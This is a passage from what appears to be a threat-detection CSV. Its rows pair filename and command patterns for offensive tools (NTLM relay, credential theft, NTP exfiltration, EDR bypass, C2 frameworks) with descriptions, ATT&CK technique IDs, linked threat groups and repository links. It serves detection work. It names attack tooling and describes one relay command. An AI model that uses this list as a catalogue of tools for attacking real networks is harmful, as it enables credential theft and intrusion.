- T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53674"
"*ntlmdecoder.py*",".{0,1000}ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53675"
"*NTLMExtract.ps1*",".{0,1000}NTLMExtract\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53676"
"*ntlm-info.py*",".{0,1000}ntlm\-info\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","53677"
"*NTLMInjector.ps1*",".{0,1000}NTLMInjector\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","53678"
"*ntlmquic.*",".{0,1000}ntlmquic\..{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53679"
"*ntlmquic-go*",".{0,1000}ntlmquic\-go.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53680"
"*ntlmquic-master*",".{0,1000}ntlmquic\-master.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53681"
"*ntlmrecon *",".{0,1000}ntlmrecon\s.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53682"
"*ntlmrecon.csv*",".{0,1000}ntlmrecon\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53683"
"*ntlmrecon:main*",".{0,1000}ntlmrecon\:main.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","53684"
"*ntlmrecon-fromfile.csv*",".{0,1000}ntlmrecon\-fromfile\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53685"
"*NTLMRecon-master*",".{0,1000}NTLMRecon\-master.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","53686"
"*ntlmrecon-ranges.csv*",".{0,1000}ntlmrecon\-ranges\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53687"
"*NTLMRelay2Self.git*",".{0,1000}NTLMRelay2Self\.git.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","53688"
"*ntlmRelayToEWS -*",".{0,1000}ntlmRelayToEWS\s\-.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53689"
"*ntlmRelayToEWS.py*",".{0,1000}ntlmRelayToEWS\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53690"
"*NtlmRelayToEWS-master*",".{0,1000}NtlmRelayToEWS\-master.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53691"
"*ntlmrelayx -*",".{0,1000}ntlmrelayx\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53692"
"*ntlmrelayx --*",".{0,1000}ntlmrelayx\s\-\-.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53693"
"*ntlmrelayx.*",".{0,1000}ntlmrelayx\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53694"
"*ntlmrelayx.exe*",".{0,1000}ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53695"
"*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","53696"
"*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","53697"
"*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","53698"
"*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","53699"
"*ntlmrelayx.py.log*",".{0,1000}ntlmrelayx\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","53700"
"*ntlmrelayx.py_to_exe*",".{0,1000}ntlmrelayx\.py_to_exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53701"
"*ntlmrelayx_original.py*",".{0,1000}ntlmrelayx_original\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53702"
"*ntlmscan.py*",".{0,1000}ntlmscan\.py.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53703"
"*ntlmscan-master.zip*",".{0,1000}ntlmscan\-master\.zip.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53704"
"*NTLMSleuth.ps1*",".{0,1000}NTLMSleuth\.ps1.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","53705"
"*NTLMSleuth.sh*",".{0,1000}NTLMSleuth\.sh.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","53706"
"*NtlmThief.exe*",".{0,1000}NtlmThief\.exe.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53707"
"*NtlmThief.sln*",".{0,1000}NtlmThief\.sln.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53708"
"*NtlmThief.vcxproj*",".{0,1000}NtlmThief\.vcxproj.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53709"
"*NtlmThief-main*",".{0,1000}NtlmThief\-main.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53710"
"*ntlmv1.py --ntlmv1 *::*",".{0,1000}ntlmv1\.py\s\-\-ntlmv1\s.{0,1000}\:\:.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53711"
"*ntlmv1.py*",".{0,1000}ntlmv1\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","53712"
"*ntlmv1_check*",".{0,1000}ntlmv1_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","53713"
"*ntlmv1-multi --ntlmv1 *",".{0,1000}ntlmv1\-multi\s\-\-ntlmv1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53714"
"*NtoskrnlOffsets.csv*",".{0,1000}NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","53716"
"*ntpescape*recv*",".{0,1000}ntpescape.{0,1000}recv.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53717"
"*ntpescape*send*",".{0,1000}ntpescape.{0,1000}send.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53718"
"*ntpescape-master.*",".{0,1000}ntpescape\-master\..{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53719"
"*NtRemoteLoad-main*",".{0,1000}NtRemoteLoad\-main.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","53720"
"*ntrights.exe*",".{0,1000}ntrights\.exe.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","N/A","7","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","53721"
"*NTT-Security-Japan/pac2*",".{0,1000}NTT\-Security\-Japan\/pac2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","53722"
"*NtUserMNDragOverExploit*",".{0,1000}NtUserMNDragOverExploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53723"
"*NtWa1tF0rS1ngle0bj3ct Executed*",".{0,1000}NtWa1tF0rS1ngle0bj3ct\sExecuted.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","53724"
"*Nuages*/Implants*",".{0,1000}Nuages.{0,1000}\/Implants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53725"
"*nuages.clearImplants *",".{0,1000}nuages\.clearImplants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53726"
"*nuages.getAutoruns*",".{0,1000}nuages\.getAutoruns.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53727"
"*nuages.getImplants*",".{0,1000}nuages\.getImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53728"
"*nuages.getListeners*",".{0,1000}nuages\.getListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53729"
"*nuages.printImplants*",".{0,1000}nuages\.printImplants.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53730"
"*nuages.printListeners*",".{0,1000}nuages\.printListeners.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53731"
